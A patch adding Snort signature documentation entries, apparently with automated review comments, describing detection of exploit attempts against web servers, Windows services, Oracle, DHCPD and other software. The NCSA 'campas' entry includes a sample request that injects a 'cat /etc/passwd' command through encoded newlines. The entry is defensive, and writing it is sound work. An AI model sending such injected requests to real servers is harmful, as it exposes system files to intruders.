+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
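Review bot: the entry never says what the rule matches; "a known vulnerability on a web server or a web application" and "attack scenarios are legion" give an analyst nothing to triage with, so name the request, path or application the signature looks for in Summary and Detailed Information. With a description this generic, "None known" under False Positives is not credible; stating the matched content is what lets a reader judge false positive likelihood.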
--- /dev/null
+++ b/doc/signatures/631.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+631
+
+--
+Summary:
+This event is generated when an external user scans an internal SMTP
+server using Network Associates' Cybercop vulnerability scanner. 
+
+--
+Impact:
+Information gathering. 
+
+--
+Detailed Information:
+Cybercop Scanner is scanning software that searches for system
+vulnerabilities. As one of its scanning procedures, it sends an EHLO
+command to SMTP server ports to determine if the SMTP server will return
+a list of remote commands that it accepts.   
+
+--
+Affected Systems:
+Any SMTP server that returns a list of acceptable commands for remote mailers.
+
+--
+Attack Scenarios:
+An attacker may run Cybercop Scanner against SMTP servers in order to
+determine vulnerabilities that can later be exploited.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure that your SMTP server does not provide more information than is
+necessary when it receives an EHLO request.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+General Cybercop information:
+http://www.securityfocus.com/products/126
+
+--
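Review bot: EHLO is the standard ESMTP greeting every ESMTP client sends, so Detailed Information ("sends an EHLO command to SMTP server ports") does not explain what distinguishes a Cybercop probe from ordinary mail traffic; the entry should state the scanner-specific content the rule keys on, and False Positives should then reflect whether a plain EHLO from a legitimate mailer can trigger it. The Corrective Action (limit what the server returns to EHLO) is sound hardening but does not stop the scan from being attempted, which is worth saying. Several lines in this entry carry trailing whitespace.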
--- /dev/null
+++ b/doc/signatures/3403.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3403
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
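Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") is not connected to the rest of the entry, which describes malformed data sent to an RPC port; if the long filename is the parameter of the DCOM request that triggers the overflow, say so, otherwise this reads as a different bug. "Expoit" should be "Exploit". Affected Systems lists no service pack levels, so a reader cannot tell patched from unpatched hosts, and Additional References is empty although Corrective Action refers to vendor supplied patches.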
--- /dev/null
+++ b/doc/signatures/2913.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2913
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure repcat_import_check
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
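Review bot: third copy of the Oracle template with the same defects: the mid-sentence break before ". This procedure is included in" after repcat_import_check, and "Oracle Oracle9i" in Affected Systems. None of the three entries says what the rule inspects in the request (presumably the procedure name followed by an oversized argument), which is what an analyst needs to confirm an alert against a packet capture.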
--- /dev/null
+++ b/doc/signatures/3106.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3106
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
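Review bot: "Microsoft Windows Server 2000" under Affected Systems is not a product name (Windows 2000 Server is presumably meant), and "Microsoft Windows NT Server" should carry a version. There is a stray blank line between the "-- " separator and "Corrective Action:", unlike every other section. Detailed Information says the unchecked buffer is in message length processing but does not say which message the rule inspects, so the rule cannot be related back to the description.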
--- /dev/null
+++ b/doc/signatures/828.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+828
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
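Review bot: like 1880.txt, this entry is generic ("a CGI web application running on a server") and never names the script or request the rule matches; add it. "running ona web server" should read "on a web server", and the line ending "can be exploited by the attacker." is not wrapped at the width the rest of the entry uses.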
--- /dev/null
+++ b/doc/signatures/1652.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1652
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in version 1.2 of NCSA web server.
+
+--
+Impact:
+File retrieval leading to compromise of confidential information, 
+potential root exploit.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to manipulate a cgi
+script to retrieve files outside the web root of version 1.2 of the NCSA
+web server.
+
+The vulnerability exists in the cgi script "campas"
+
+--
+Affected Systems:
+	web servers running a very old (1995) version of NCSA web 
+	server may have this cgi script installed.
+
+--
+Attack Scenarios:
+The attacker can make an HTTP GET request to the script and include
+variables to retrieve a sensitive system file in the following manner:
+
+GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
+
+--
+Ease of Attack:
+Simple. No exploit software required
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
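Review bot: the sample request in Attack Scenarios ("GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a") injects a command through encoded newlines rather than traversing a path, so Detailed Information should describe the flaw as command injection; that also accounts for the "potential root exploit" in Impact, which a plain file-retrieval description does not. Corrective Action should recommend removing the campas script, since Affected Systems already says only very old installs "may have this cgi script installed". The sentence "The vulnerability exists in the cgi script "campas"" lacks a full stop.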
--- /dev/null
+++ b/doc/signatures/2258.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Messenger service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to improper length validation in the Microsoft Windows Messenger
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, this vulnerability may present the attacker with the
+opportunity to execute code with the privileges of the local system
+account with full access to all resources on the target host.
+
+--
+Affected Systems:
+	Microsoft Windows NT Workstation 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
+	Microsoft Windows 2000, Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP Gold, Service Pack 1
+	Microsoft Windows XP 64-bit Edition
+	Microsoft Windows XP 64-bit Edition Version 2003
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2003 64-bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Disable the Windows messenger service
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/575892
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-043.asp
+
+--
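Review bot: the Sid field is empty ("Sid:" followed by a blank line) although the file is named 2258.txt; fill in 2258, since anything indexing these documents by SID will miss this entry. "Disable the Windows messenger service" lacks a full stop and "Messenger" should be capitalised to match the Summary. Otherwise this is the best-formed entry in the group and the only one with Additional References filled in (CERT VU#575892 and MS03-043).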
--- /dev/null
+++ b/doc/signatures/2319.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2319
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ebola from PLD Software.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible.
+
+--
+Detailed Information:
+Ebola from PLD Software is used to improve the performance of Anti-Virus
+solutions on Linux systems.
+
+A buffer overflow condition is present in the authentication mechanism
+such that it may be triggered by the generation of an error message from
+an unsuccessful authentication attempt.
+
+--
+Affected Systems:
+	All versions of Ebola prior to 0.1.5
+
+--
+Attack Scenarios:
+An attacker can send specially crafted authentication attempts to the Ebola system and
+cause the buffer overflow thus presenting the opportunity to execute
+arbitrary code.
+
+--
+Ease of Attack:
+Simple. Expoits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
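Review bot: "Expoits" under Ease of Attack should be "Exploits". The first line of Attack Scenarios ("An attacker can send specially crafted authentication attempts to the Ebola system and") runs past the wrap width used in the rest of the file. Affected Systems names 0.1.5 as the first fixed version, so Corrective Action should say "0.1.5 or later" rather than only "latest non-affected version".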
--- /dev/null
+++ b/doc/signatures/3102.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3102
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
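Review bot: this entry is identical to 3106.txt except for the Sid, including the "Microsoft Windows Server 2000" product name and the stray blank line before "Corrective Action:". Two rules with identical documentation give an analyst no way to tell which one fired and why; Detailed Information should state how 3102 differs from 3106.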
--- /dev/null
+++ b/doc/signatures/100000695.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000695
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "rating.php" with SQL commands being passed as the "card_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "card_id" parameter in the "rating.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
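Review bot: the file opens with two blank lines before "Rule:", unlike the other entries, and the "--" after Sid lacks the blank line used elsewhere. The third paragraph of Detailed Information is the credential-validation boilerplate and does not describe SQL injection, and the second paragraph is a run-on ("...for the application, the attacker may also..."). "running ona web server" should read "on a web server", and "an exploitation attempt has been attempted" is redundant. Corrective Action only says to patch; Attack Scenarios already identifies unsanitized input as the root cause, so the fix section should point at input validation as well.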
--- /dev/null
+++ b/doc/signatures/1075.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1075
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
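Review bot: "Sid: 1075" puts the value on the label line, while every other entry puts it on the following line; a parser expecting the value on its own line will read an empty SID. "Information gathering possible administrator access." under Impact needs punctuation ("Information gathering; possible administrator access."). The entry never names the file the rule detects access to ("a sensitive file containing information on the IIS implementation"), which is the one fact an analyst needs to confirm the alert.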
--- /dev/null
+++ b/doc/signatures/2283.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2283
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
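Review bot: the entry does not name the script or parameter through which MediaWiki ends up including "php files of the attackers choosing", so the rule cannot be related to the description. Affected Systems repeats the product name ("MediaWiki MediaWiki-stable 20031107"). "MediaWiki ." has a stray space before the full stop, and "attackers choosing" should be "attacker's choosing" (the same slip recurs across several entries in this patch).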
--- /dev/null
+++ b/doc/signatures/1527.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+1527
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Basilix webmail PHP script.
+
+An attacker can access mysql.class file to obtain MySQL login and use it
+for further attacks.
+
+--
+Impact:
+Serious. Password disclosure which can lead to further system 
+compromise.
+
+authenticate directly to a mysql database. Many Sun Cobalt Linux servers use Basilix webmail
+
+--
+Detailed Information:
+A webserver usually sends files in the webroot to an anonymous user 
+without further processing. PHP scripts often include files (which 
+contain configuration variables, functions, etc.) that are stored 
+using a suffix that does not prevent a webserver sending them in clear 
+text. The ".class" suffix is not usually explicitly denied in a standard
+web server configuration and the file "mysql.class" may be sent to the 
+attacker.
+
+--
+Attack Scenarios:
+An attacker gets mysql.class containing database login credentials. The attacker can then connect to the database server using the login provided by mysql.class file and modify the database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+File doesn't exist or mysql.class is for example a java class file publicly available on the server
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update Basilix script (www.basilix.org)
+
+Check files which contain php code for a suffix that might be rendered in plaintext by the web server.
+
+Workaround - register .class the same way that the extensions .php, .php3 or.php4 are registered in the web server configuration file.
+Note: .class is usually used by java applets
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+-- 
+Additional References:
+
+
+--
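Review bot: the Impact section of doc/signatures/1527.txt contains a dangling fragment, "authenticate directly to a mysql database. Many Sun Cobalt Linux servers use Basilix webmail", which has lost its opening clause and its terminating period; it reads as a leftover from an edit and should either be completed as a sentence (the disclosed credentials let the attacker authenticate directly to the database) or removed. The file also lacks the Affected Systems section between Detailed Information and Attack Scenarios that every other signature document in this patch has; listing the vulnerable Basilix versions there would back the "Update Basilix script" advice. Minor: "or.php4" is missing a space, and the Contributors block lacks the blank line before "--" used elsewhere.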
--- /dev/null
+++ b/doc/signatures/3042.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3042
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
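Review bot: the Additional References section of doc/signatures/3042.txt is empty for a vulnerability described precisely enough ("ACE size of 0" in NT ACL parsing, "Ethereal 0.10.7 and prior") to have a vendor advisory; it should be cited so responders can confirm the fixed version the Corrective Action asks them to upgrade to. Style: "None Known" differs from the "None known." form used in the neighbouring files, and several "-- " delimiter lines carry trailing whitespace.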
--- /dev/null
+++ b/doc/signatures/2039.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+2039
+
+--
+Summary:
+The Dynamic Host Configuration Protocol (DHCP) daemon is used to issue 
+dynamic IP addresses from a server to client machines. A vulnerability 
+exists such that arbitrary code may be executed on the server using the 
+credential of the super user (root).
+
+--
+Impact:
+Execution of code and possible control of the targeted machine.
+
+--
+Detailed Information:
+A format string vulnerabilty in some versions of dhcpd may lead to the 
+execution of arbitrary code as the root user via a DNS server response. 
+This is due to the unsafe logging of user data. The option NSUPDATE 
+option in the configuration of dhcpd must be enabled, although this is a
+default option in version 3.0 and later.
+
+Two exploits for this vulnerability are known to exist.
+
+--
+Affected Systems:
+ISC DHCPD 3.0
+ Caldera OpenLinux Server 3.1 and 3.1.1
+ Caldera OpenLinux Workstation 3.1 and 3.1.1
+ Conectiva Linux 8.0
+ MandrakeSoft Linux Mandrake 8.1, 8.1 ia64, 8.2, 8.2 ppc and 9.0
+ MandrakeSoft Multi Network Firewall 8.2
+ S.u.S.E. Linux 7.2, 7.3 and 8.0
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server
+ S.u.S.E. Linux Enterprise Server 7 and S/390
+
+ISC DHCPD 3.0.1 rc8 and ISC DHCPD 3.0.1 rc7
+ FreeBSD FreeBSD 4.1.1, 4.2, 4.3, 4.4 and 4.5
+
+ISC DHCPD 3.0.1 rc6
+ S.u.S.E. Linux 8.0 and 8.0 i386
+
+ISC DHCPD 3.0.1 rc5, ISC DHCPD 3.0.1 rc4
+OpenPKG OpenPKG 1.0
+
+ISC DHCPD 3.0.1 rc3, rc2 and rc1
+
+--
+Attack Scenarios:
+The attacker could send a specially crafted packet to the dhcpd server or use one of the exploits widely available for this vulnerability.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches from the vendor should be applied as soon as possible.
+
+Upgrade to ISC DHCPD 3.0.1 rc 9.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4701
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0702
+
+--
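Review bot: two wording defects in the Detailed Information paragraph of doc/signatures/2039.txt: "vulnerabilty" should be "vulnerability", and "The option NSUPDATE option in the configuration" duplicates "option". In Corrective Action, "ISC DHCPD 3.0.1 rc 9" should be written "rc9" to match the "rc8", "rc7" forms in Affected Systems, and the Affected Systems list mixes indentation (vendor lines are indented one space except "OpenPKG OpenPKG 1.0"). The Summary does not open with the "This event is generated when" sentence the other files use, so the reader has to infer from Detailed Information that the rule fires on a DNS server response rather than on DHCP client traffic; stating that explicitly would help triage.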
--- /dev/null
+++ b/doc/signatures/3098.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3098
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
